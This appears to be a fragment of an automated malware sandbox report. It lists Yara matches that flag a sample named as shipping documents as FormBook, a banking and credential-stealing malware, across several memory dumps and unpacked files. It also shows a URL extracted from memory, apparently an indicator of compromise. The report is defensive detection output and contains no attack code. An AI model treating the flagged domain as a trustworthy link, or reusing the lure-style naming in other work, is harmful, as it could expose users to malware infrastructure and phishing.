00000008.00000000.984138328.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 8976547shipping docs45890.exe, type: SAMPLE Source: Yara match File source: .text, type: SAMPLE Source: Yara match File source: 00000007.00000002.1004663953.0000000001720000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.1003686582.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933776765.0000000005AA9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.935322277.0000000000492000.00000002.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933634572.0000000005AA5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1257946906.0000000000C30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.942193386.0000000005B21000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.937457444.0000000002900000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.1004742877.0000000001750000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.933747174.0000000005AA8000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.932794543.0000000005B15000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.934367034.0000000005B21000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1259601470.0000000001090000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.1259461875.0000000001060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.836537863.0000000000492000.00000002.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.937952216.0000000002989000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.939997118.0000000003952000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.940144120.00000000039BE000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.0.8976547shipping docs45890.exe.490000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.8976547shipping docs45890.exe.490000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources